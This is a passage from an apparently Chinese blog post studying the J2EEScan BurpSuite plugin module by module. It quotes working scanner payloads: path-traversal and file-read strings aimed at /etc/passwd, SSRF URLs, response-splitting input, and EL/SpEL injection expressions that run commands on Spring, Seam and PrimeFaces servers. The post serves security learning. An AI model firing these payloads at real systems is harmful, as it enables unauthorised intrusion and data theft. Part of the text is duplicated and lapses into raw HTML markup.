            "/jkstatus",
            "/jkmanager",
            "/jkmanager-auth",
            "/jdkstatus"
    );   

match

    private static final byte[] GREP_STRING = "JK Status Manager".getBytes();

【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第12张图片
未授权访问远程WEB 用户的一些信息

【39】LFIAbsoluteModule

payload

    private static final List<byte[]> LFI_INJECTION_TESTS = Arrays.asList(
            ".../....///.../....///.../....///.../....///.../....///.../....///etc/passwd".getBytes(),
            ".../...//.../...//.../...//.../...//.../...//.../...//.../...//.../...//etc/passwd".getBytes(),
            "../../../../../../../../../../../../../../../../etc/passwd%00.html".getBytes(),
            "file:///c:/windows/win.ini".getBytes(),
            "file:///etc/passwd".getBytes(),
            "file://\\/\\/etc/passwd".getBytes(),
            "%2fetc%2fpasswd".getBytes(),
            "../../../../../../../../../../../../../../../../windows/win.ini".getBytes(),
            "../../../../../../../../../../../../../../../../windows/win.ini%00.html".getBytes()
    );    

通用型的任意文件读取

【40】LFIModule

payload

    private static final List<byte[]> LFI_INJECTION_TESTS = Arrays.asList(
            "../../../../WEB-INF/web.xml".getBytes(),
            "../../../WEB-INF/web.xml".getBytes(),
            "../../WEB-INF/web.xml".getBytes(),
            "../WEB-INF/web.xml".getBytes(),
            "%c0%ae/WEB-INF/web.xml".getBytes(),
            "%c0%ae/%c0%ae/WEB-INF/web.xml".getBytes(),
            "%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml".getBytes(),
            "%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml".getBytes(),
            // Spring Webflow payloads
            "../../../WEB-INF/web.xml;x=".getBytes(),
            "../../WEB-INF/web.xml;x=".getBytes(),  
            "../WEB-INF/web.xml;x=".getBytes(),
            "WEB-INF/web.xml".getBytes(),
            ".//WEB-INF/web.xml".getBytes()
    );    
    

match


    private static final byte[] GREP_STRING = ".getBytes();

这是读web目录,通用型的任意文件读取。

【41】NextFrameworkPathTraversal

payload

    private static final String NEXT_TRAVERSAL = "/_next/../../../../../../../../../etc/passwd";

nextjs的任意文件读取
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第13张图片
修复的话对传入的path做了判断
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第14张图片

【42】NodeJSPathTraversal nodejs路径穿越

payload

    private static final String NODEJS_TRAVERSAL = "../../../j/../../../../etc/passwd";

修复mr:https://github.com/nodejs/node/commit/b98e8d995efb426bbdee56ce503017bdcbbc6332

【43】NodeJSRedirect

payload

    private static final String NODEJS_PATH = "///www.example.com/%2e%2e";

路由问题导致的URL跳转
match是否location即可

 if (nodejsInfo.getStatusCode() == 301
                        || nodejsInfo.getStatusCode() == 302
                        || nodejsInfo.getStatusCode() == 303) {

                    String locationHeader = HTTPParser.getResponseHeaderValue(nodejsInfo, "Location");

                    if (locationHeader != null && locationHeader.startsWith("/www.example.com")) {

【44】NodeJSResponseSplitting CVE-2016-2216

响应拆分漏洞
payload

    private static final byte[] NODEJS_INJ = "%c4%8d%c4%8aInjectionHeader:%2020%c4%8d%c4%8a".getBytes();

match是从返回包头找有没有插进去
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第15张图片
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第16张图片

【45】OASConfigFilesDisclosure

path

private static final List<String> OAS_PATHS = Arrays.asList(
            "/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml",
            "/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml",
            "/xsql/lib/XSQLConfig.xml",
            "/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml",
            "/globals.jsa",
            "/demo/ojspext/events/globals.jsa",
            // Dynamic Monitoring Services 
            "/dms/AggreSpy",
            "/soap/servlet/Spy",
            "/servlet/Spy",
            "/servlet/DMSDump",
            "/dms/DMSDump",
            // Oracle Java Process Manager 
            "/oprocmgr-status",
            "/oprocmgr-service",
            "/soap/servlet/soaprouter",
            "/fcgi-bin/echo",
            "/fcgi-bin/echo2",
            "/fcgi-bin/echo.exe",
            "/fcgi-bin/echo2.exe",
            // BC4J Runtime Parameters            
            "/webapp/wm/runtime.jsp"
            
            //TODO CVE-2002-0565
//            "/_pages/_webapp/_admin/_showpooldetails.java",
//            "/_pages/_webapp/_admin/_showjavartdetails.java",
//            "/_pages/_webapp/_jsp/",
//            "/_pages/_demo/",
//            "/_pages/_demo/_sql/_pages/",
//            "/OA_HTML/AppsLocalLogin.jsp"
    );

返回包match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "SOAP configuration file".getBytes(),
            "On a PRODUCTION system".getBytes(),
            "<%".getBytes(),
            ".getBytes(),
            "DMS Metrics".getBytes(),
            "Current Metric Values".getBytes(),
            "Process Status".getBytes(),
            "SOAP Server".getBytes(),
            "DOCUMENT_ROOT=".getBytes(),
            "BC4J Runtime Parameters".getBytes()
    );

02年的洞
可以理解为oracle一些敏感文件的泄露,感觉现在应该不太可能有了,20年了。

【46】OASSqlnetLogDisclosure

path

private static final List<String> SQLNETLOG_PATHS = Arrays.asList(
            "/sqlnet.log"
    );

match

private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "VERSION INFORMATION".getBytes()
    );

sql的一写日志泄露。

【47】OracleCGIPrintEnv

path

private static final List<String> CGIENV_PATHS = Arrays.asList(
            "/cgi-bin/printenv"
    );

match

 private static final byte[] GREP_STRINGS = "DOCUMENT_ROOT".getBytes();

同样的是敏感信息泄露。

【48】OracleEBSSSRF - CVE-2017-10246

payload

        String Oracle_SSRF_Help = String.format("/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://%s:80/", currentCollaboratorPayload);

是个前台的洞

【49】OracleEBSSSRFLCMServiceController - CVE-2018-3167

payload

        String oracleSSRFDoctypePayload = String.format("", currentCollaboratorPayload);

是一个XXE 漏洞,可以打SSRF

【50】OracleReportService

path

    private static final List<String> ORACLE_REPORT_SERVICE_PATHS = Arrays.asList(
            "/reports/rwservlet/getserverinfo",
            "/reports/rwservlet/showenv",
            "/reports/rwservlet/showjobs",
            "/reports/rwservlet/showmap"
    );

match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "Successful Jobs".getBytes(),
            "Servlet Environment Variables".getBytes(),
            "Reports Server Queue Status".getBytes(),
            "Reports Servlet Key Map".getBytes()
    );

这里面的路径都是敏感信息泄露。
其中

                                if (ORACLE_REPORT_SERVICE_PATH.equalsIgnoreCase("/reports/rwservlet/showmap")) {

格外关键,将rsp保存下来单独分析。
按行读取

String[] lines = helpers.bytesToString(showMapPage).split("\n")

找到行中包含

OraInstructionText

并进行match

    private static final Pattern REPORT_SERVICE_KEY_PATTERN = Pattern.compile("OraInstructionText>([^<]+)<");

如果通过上面正则,没有找到了如下的key

private static final List<String> KEYMAPS_TO_IGNORE = Arrays.asList(
            "%ENV_NAME%",
            "barcodepaper",
            "barcodeweb",
            "breakbparam",
            "charthyperlink_ias",
            "charthyperlink_ids",
            "distributionpaper",
            "express",
            "orqa",
            "parmformjsp",
            "pdfenhancements",
            "report_defaultid",
            "report_secure",
            "run",
            "runp",
            "tutorial",
            "xmldata"
    );

则把匹配到的key拼接,然后发起请求

        String RWSERVLET_PARSEQUERY_URL = "/reports/rwservlet/parsequery?";
                        URL urlToTest = new URL(protocol, url.getHost(), url.getPort(), RWSERVLET_PARSEQUERY_URL + key);

预期是请求得到username 和pwd

    private static final Pattern PWD_DISCLOSURE_PATTERN = Pattern.compile("userid=([^/]+)/([^@]+)@([^ \\t]+)([ \\t]|$)");

预期的rsp
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第17张图片
05年的洞,估计也基本没有了。

【41】NextFrameworkPathTraversal

payload

    private static final String NEXT_TRAVERSAL = "/_next/../../../../../../../../../etc/passwd";

nextjs的任意文件读取
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第18张图片
修复的话对传入的path做了判断
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第19张图片

【42】NodeJSPathTraversal nodejs路径穿越

payload

    private static final String NODEJS_TRAVERSAL = "../../../j/../../../../etc/passwd";

修复mr:https://github.com/nodejs/node/commit/b98e8d995efb426bbdee56ce503017bdcbbc6332

【43】NodeJSRedirect

payload

    private static final String NODEJS_PATH = "///www.example.com/%2e%2e";

路由问题导致的URL跳转
match是否location即可

 if (nodejsInfo.getStatusCode() == 301
                        || nodejsInfo.getStatusCode() == 302
                        || nodejsInfo.getStatusCode() == 303) {

                    String locationHeader = HTTPParser.getResponseHeaderValue(nodejsInfo, "Location");

                    if (locationHeader != null && locationHeader.startsWith("/www.example.com")) {

【44】NodeJSResponseSplitting CVE-2016-2216

响应拆分漏洞
payload

    private static final byte[] NODEJS_INJ = "%c4%8d%c4%8aInjectionHeader:%2020%c4%8d%c4%8a".getBytes();

match是从返回包头找有没有插进去
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第20张图片
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第21张图片

【45】OASConfigFilesDisclosure

path

private static final List<String> OAS_PATHS = Arrays.asList(
            "/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml",
            "/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml",
            "/xsql/lib/XSQLConfig.xml",
            "/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml",
            "/globals.jsa",
            "/demo/ojspext/events/globals.jsa",
            // Dynamic Monitoring Services 
            "/dms/AggreSpy",
            "/soap/servlet/Spy",
            "/servlet/Spy",
            "/servlet/DMSDump",
            "/dms/DMSDump",
            // Oracle Java Process Manager 
            "/oprocmgr-status",
            "/oprocmgr-service",
            "/soap/servlet/soaprouter",
            "/fcgi-bin/echo",
            "/fcgi-bin/echo2",
            "/fcgi-bin/echo.exe",
            "/fcgi-bin/echo2.exe",
            // BC4J Runtime Parameters            
            "/webapp/wm/runtime.jsp"
            
            //TODO CVE-2002-0565
//            "/_pages/_webapp/_admin/_showpooldetails.java",
//            "/_pages/_webapp/_admin/_showjavartdetails.java",
//            "/_pages/_webapp/_jsp/",
//            "/_pages/_demo/",
//            "/_pages/_demo/_sql/_pages/",
//            "/OA_HTML/AppsLocalLogin.jsp"
    );

返回包match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "SOAP configuration file".getBytes(),
            "On a PRODUCTION system".getBytes(),
            "<%".getBytes(),
            ".getBytes(),
            "DMS Metrics".getBytes(),
            "Current Metric Values".getBytes(),
            "Process Status".getBytes(),
            "SOAP Server".getBytes(),
            "DOCUMENT_ROOT=".getBytes(),
            "BC4J Runtime Parameters".getBytes()
    );

02年的洞
可以理解为oracle一些敏感文件的泄露,感觉现在应该不太可能有了,20年了。

【46】OASSqlnetLogDisclosure

path

private static final List<String> SQLNETLOG_PATHS = Arrays.asList(
            "/sqlnet.log"
    );

match

private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "VERSION INFORMATION".getBytes()
    );

sql的一写日志泄露。

【47】OracleCGIPrintEnv

path

private static final List<String> CGIENV_PATHS = Arrays.asList(
            "/cgi-bin/printenv"
    );

match

 private static final byte[] GREP_STRINGS = "DOCUMENT_ROOT".getBytes();

同样的是敏感信息泄露。

【48】OracleEBSSSRF - CVE-2017-10246

payload

        String Oracle_SSRF_Help = String.format("/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://%s:80/", currentCollaboratorPayload);

是个前台的洞

【49】OracleEBSSSRFLCMServiceController - CVE-2018-3167

payload

        String oracleSSRFDoctypePayload = String.format("", currentCollaboratorPayload);

是一个XXE 漏洞,可以打SSRF

【50】OracleReportService

path

    private static final List<String> ORACLE_REPORT_SERVICE_PATHS = Arrays.asList(
            "/reports/rwservlet/getserverinfo",
            "/reports/rwservlet/showenv",
            "/reports/rwservlet/showjobs",
            "/reports/rwservlet/showmap"
    );

match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "Successful Jobs".getBytes(),
            "Servlet Environment Variables".getBytes(),
            "Reports Server Queue Status".getBytes(),
            "Reports Servlet Key Map".getBytes()
    );

这里面的路径都是敏感信息泄露。
其中

                                if (ORACLE_REPORT_SERVICE_PATH.equalsIgnoreCase("/reports/rwservlet/showmap")) {

格外关键,将rsp保存下来单独分析。
按行读取

String[] lines = helpers.bytesToString(showMapPage).split("\n")

找到行中包含

OraInstructionText

并进行match

    private static final Pattern REPORT_SERVICE_KEY_PATTERN = Pattern.compile("OraInstructionText>([^<]+)<");

如果通过上面正则,没有找到了如下的key

private static final List<String> KEYMAPS_TO_IGNORE = Arrays.asList(
            "%ENV_NAME%",
            "barcodepaper",
            "barcodeweb",
            "breakbparam",
            "charthyperlink_ias",
            "charthyperlink_ids",
            "distributionpaper",
            "express",
            "orqa",
            "parmformjsp",
            "pdfenhancements",
            "report_defaultid",
            "report_secure",
            "run",
            "runp",
            "tutorial",
            "xmldata"
    );

则把匹配到的key拼接,然后发起请求

        String RWSERVLET_PARSEQUERY_URL = "/reports/rwservlet/parsequery?";
                        URL urlToTest = new URL(protocol, url.getHost(), url.getPort(), RWSERVLET_PARSEQUERY_URL + key);

预期是请求得到username 和pwd

    private static final Pattern PWD_DISCLOSURE_PATTERN = Pattern.compile("userid=([^/]+)/([^@]+)@([^ \\t]+)([ \\t]|$)");

预期的rsp
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第22张图片
05年的洞,估计也基本没有了。

【51】PivotalSpringTraversal CVE-2014-3625

路径

private static final List<String> staticURLFolders = Arrays.asList(
            "/resources/",
            "/files/",
            "/upload/",
            "/static/",
            "/content/",
            "/html/",
            "/deploy/"
    );

先判断真实的路径中有没有上述的path

        for (String staticResourceFolder : staticURLFolders) {

            if (currentPath.contains(staticResourceFolder)) {

然后将原始的HTTP做一个替换

                String mutatedHTTPRequest = mutator(HTTPRequest, staticResourceFolder, staticResourceFolder + INJ);

替换的payload是

    private static final String INJ = "file:/etc/passwd";

mutator函数就是一个找正则然后replace

    private String mutator(String httpRequest, String staticResourceFolder, String payload) {
        return httpRequest.replaceFirst(staticResourceFolder + ".* ", payload + " ");
    }

【52】PrimeFacesELInjection - CVE-2017-1000486

payload

        PAYLOADS.add("/javax.faces.resource/j2eescan.xhtml?pfdrt=sc&ln=primefaces&pfdrid=" + PrimeFacesELInjection.INJ_TEST);
        PAYLOADS.add("/javax.faces.resource/j2eescan.jsf?pfdrt=sc&ln=primefaces&pfdrid=" + PrimeFacesELInjection.INJ_TEST);

    private static final String INJ_TEST = "uMKljPgnOTVxmOB%2bH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVYjEh7SE3F4WmfKUle6apy2QGwABuVlzurPsgFxYP0G3b1dDqmgmxMw%3d%3d";

match返回包则存在漏洞

   if (header.contains("J2EESCANPRIME")) {

这是个RCE
关键是这个pfdrid参数,是EL表达式的加密结果。
这里payload是加密下面的表达式,所以判断返回包是看headers

"${facesContext.getExternalContext().setResponseHeader(\\\"J2EESCANPRIME\\\",\\\"primefaces\\\")}"

默认密码是

Default = primefaces

利用工具看这个

https://github.com/pimps/CVE-2017-1000486

【53】RESTAPISwagger

REST API Swagger 的相关问题
相关路径

    private static final List<String> SWAGGER_APIS = Arrays.asList(
            "/swagger-ui.html",
            "/swagger/swagger-ui.html",
            "/api/swagger-ui.html",
            "/swagger/index.html",
            "/%20/swagger-ui.html"
    );

这个我们见得比较多了,这里面能拿到服务端的一些API构造。
match

 private static final byte[] GREP_STRING = "Swagge"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <h3>【54】Seam2RCE(Jboss) - CVE-2010-1871</h3> 
  <p>JBoss seam2的模板注入<br> payload</p> 
  <pre><code class="prism language-java"> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> rawSimpleRequestSeam <span class="token operator">=</span> helpers<span class="token punctuation">.</span><span class="token function">addParameter</span><span class="token punctuation">(</span>rawRequest<span class="token punctuation">,</span>
                    helpers<span class="token punctuation">.</span><span class="token function">buildParameter</span><span class="token punctuation">(</span><span class="token string">"actionOutcome"</span><span class="token punctuation">,</span>
                            <span class="token string">"/pwd.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}"</span><span class="token punctuation">,</span> <span class="token class-name">IParameter</span><span class="token punctuation">.</span>PARAM_URL<span class="token punctuation">)</span>
            <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>match的是hostname?</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING_L <span class="token operator">=</span> <span class="token string">"java.lang.UNIXProcess"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING_W <span class="token operator">=</span> <span class="token string">"java.lang.ProcessImpl"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>上面的payload是直接反射取<br> 下面这个是遍历取,有一点绕过的感觉,</p> 
  <pre><code class="prism language-java">        <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> rawRequestSeam <span class="token operator">=</span> helpers<span class="token punctuation">.</span><span class="token function">addParameter</span><span class="token punctuation">(</span>rawRequest<span class="token punctuation">,</span>
                        helpers<span class="token punctuation">.</span><span class="token function">buildParameter</span><span class="token punctuation">(</span><span class="token string">"actionOutcome"</span><span class="token punctuation">,</span>
                                <span class="token string">"/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["</span> <span class="token operator">+</span> i <span class="token operator">+</span> <span class="token string">"].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}}"</span><span class="token punctuation">,</span> <span class="token class-name">IParameter</span><span class="token punctuation">.</span>PARAM_URL<span class="token punctuation">)</span>
                <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>match一样</p> 
  <h3>【55】 SnoopResource</h3> 
  <p>看着像是GET请求的XSS<br> PATH</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> SNOOP_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/snoop.jsp?"</span> <span class="token operator">+</span> XSS_PAYLOAD<span class="token punctuation">,</span>
            <span class="token string">"/examples/jsp/snp/snoop.jsp?"</span> <span class="token operator">+</span> XSS_PAYLOAD<span class="token punctuation">,</span>
            <span class="token string">"/examples/servlet/SnoopServlet?"</span> <span class="token operator">+</span> XSS_PAYLOAD<span class="token punctuation">,</span>
            <span class="token string">"/servlet/SnoopServlet?"</span> <span class="token operator">+</span> XSS_PAYLOAD<span class="token punctuation">,</span>
            <span class="token string">"/j2ee/servlet/SnoopServlet?"</span> <span class="token operator">+</span> XSS_PAYLOAD<span class="token punctuation">,</span>
            <span class="token string">"/jsp-examples/snp/snoop.jsp?"</span> <span class="token operator">+</span> XSS_PAYLOAD
    <span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>payload用的h1标签</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">String</span> XSS_PAYLOAD <span class="token operator">=</span> <span class="token string">"<h1>j2eescan"</span><span class="token punctuation">;</span> 
</code></pre> 
  <p>有意思的是<br> match如果是</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span> GREP_STRING <span class="token operator">=</span> <span class="token string">"Path translated"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>则是低危<br> 如果是</p> 
  <pre><code class="prism language-java"><span class="token generics"><span class="token punctuation"><</span>h1<span class="token punctuation">></span></span>j2eescan"<span class="token punctuation">;</span> 
</code></pre> 
  <p>就是中危</p> 
  <h3>【56】SpringBootActuator</h3> 
  <p>遍历Path</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> SPRINGBOOT_ACTUATOR_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/health"</span><span class="token punctuation">,</span>
            <span class="token string">"/manager/health"</span><span class="token punctuation">,</span>
            <span class="token string">"/actuator"</span><span class="token punctuation">,</span>
            <span class="token string">"/actuator/jolokia/list"</span><span class="token punctuation">,</span>
            <span class="token string">"/jolokia/list"</span><span class="token punctuation">,</span>
            <span class="token string">"/env"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>match这几个</p> 
  <pre><code class="prism language-java">        <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> GREP_STRINGS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"{\"status\":\"UP\"}"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"{\"_links\":"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"org.spring"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"java.vendor"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
        
    
</code></pre> 
  <p>SpringBoot 的内存泄露吧,之前因为这个页面泄露了大量用户token能直接接管用户账号,所以也并不是他描述的low,需要实际去看。</p> 
  <h3>【57】SpringBootRestRCE cve-2017-8046</h3> 
  <p>首先POST换成PATCH(这里GET还不行?)</p> 
  <pre><code class="prism language-java">            headers<span class="token punctuation">.</span><span class="token function">set</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> firstHeader<span class="token punctuation">.</span><span class="token function">replaceFirst</span><span class="token punctuation">(</span><span class="token string">"POST "</span><span class="token punctuation">,</span> <span class="token string">"PATCH "</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>换个contenttype和accept</p> 
  <pre><code class="prism language-java">            <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> headersWithContentTypePatch <span class="token operator">=</span> <span class="token class-name">HTTPParser</span><span class="token punctuation">.</span><span class="token function">addOrUpdateHeader</span><span class="token punctuation">(</span>headers<span class="token punctuation">,</span> <span class="token string">"Content-type"</span><span class="token punctuation">,</span> <span class="token string">"application/json-patch+json"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> headersWithContentTypePatchAndAccept <span class="token operator">=</span> <span class="token class-name">HTTPParser</span><span class="token punctuation">.</span><span class="token function">addOrUpdateHeader</span><span class="token punctuation">(</span>headersWithContentTypePatch<span class="token punctuation">,</span> <span class="token string">"Accept"</span><span class="token punctuation">,</span> <span class="token string">"*/*"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>


</code></pre> 
  <p>发送payload</p> 
  <pre><code class="prism language-java">            <span class="token class-name">String</span> finalPayload <span class="token operator">=</span> <span class="token string">"[{ \"op\" : \"replace\", \"path\" : \"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("</span> <span class="token operator">+</span> payload <span class="token operator">+</span> <span class="token string">").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x\", \"value\" : \"j2eescan\" }]"</span><span class="token punctuation">;</span>

</code></pre> 
  <p>无回显的话payload可以用ping dns来match</p> 
  <h3>【58】SpringCloudConfigPathTraversal cve-2020-5410</h3> 
  <p><img src="http://img.e-com-net.com/image/info8/1dd1c101b0be49cb837fdb2f5164de1a.jpg" alt="" width="0" height="0"><br> 2020年的洞<br> Spring Cloud Config的目录穿越,比较好构造<br> payload</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> SPRINGCLOUD_TRAVERSALS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>match passwod就行</p> 
  <h3>【59】 SpringDataCommonRCE cve-2018-1273</h3> 
  <blockquote> 
   <p>https://mp.weixin.qq.com/s?__biz=MzU0NzYzMzU0Mw==&mid=2247483666&idx=1&sn=91e3b2aab354c55e0677895c02fb068c</p> 
  </blockquote> 
  <p>这是个spel表达式注入漏洞<br> 补丁大致就是将StandardEvaluationContext替代为SimpleEvaluationContext,由于StandardEvaluationContext权限过大,可以执行任意代码,会被恶意用户利用。<br> SimpleEvaluationContext的权限则小的多,只支持一些map结构,通用的jang.lang.Runtime,java.lang.ProcessBuilder都已经不再支持,详情可查看SimpleEvaluationContext的实现。<br> <img src="http://img.e-com-net.com/image/info8/8998fa2219074b66928902217cc4df35.jpg" alt="在这里插入图片描述" width="0" height="0"></p> 
  <p>payload</p> 
  <pre><code class="prism language-java">        <span class="token class-name">String</span> injection <span class="token operator">=</span> <span class="token string">"[#this.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"%s\")]="</span><span class="token punctuation">;</span>

</code></pre> 
  <p>替换的方式是</p> 
  <pre><code class="prism language-java">        <span class="token class-name">String</span> updatedBody <span class="token operator">=</span> requestBody<span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span><span class="token string">"="</span><span class="token punctuation">,</span> finalPayload<span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p><img src="http://img.e-com-net.com/image/info8/7a1bad4808a74322b8a28abc69cace3b.jpg" alt="在这里插入图片描述" width="0" height="0"></p> 
  <h3>【60】SpringWebFlowDataBindExpression CVE-2017-4971</h3> 
  <p>Spring WebFlow 2.4.0 - 2.4.4<br> payload一把梭</p> 
  <pre><code class="prism language-java">        <span class="token class-name">String</span> injection <span class="token operator">=</span> <span class="token string">"_(new java.lang.ProcessBuilder(\"bash\",\"-c\",\"ping -c 3 %s\")).start()"</span><span class="token punctuation">;</span>

</code></pre> 
  <p><img src="http://img.e-com-net.com/image/info8/c6ed2e2443934282944b60d25a70590b.jpg" alt="在这里插入图片描述" width="0" height="0"><br> <img src="http://img.e-com-net.com/image/info8/be0cdc05d40e449ea62ea26fc8d3e8fe.jpg" alt="触发的" width="0" height="0"><br> 触发位置是提交表单。</p> 
  <h3>【61】SSRFScanner</h3> 
  <p>地址:</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> SSRF_INJECTION_TESTS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"gopher://localhost:22/"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"http://[::]:22/"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"ftp://[::]:22/"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"ftp://localhost:22/"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
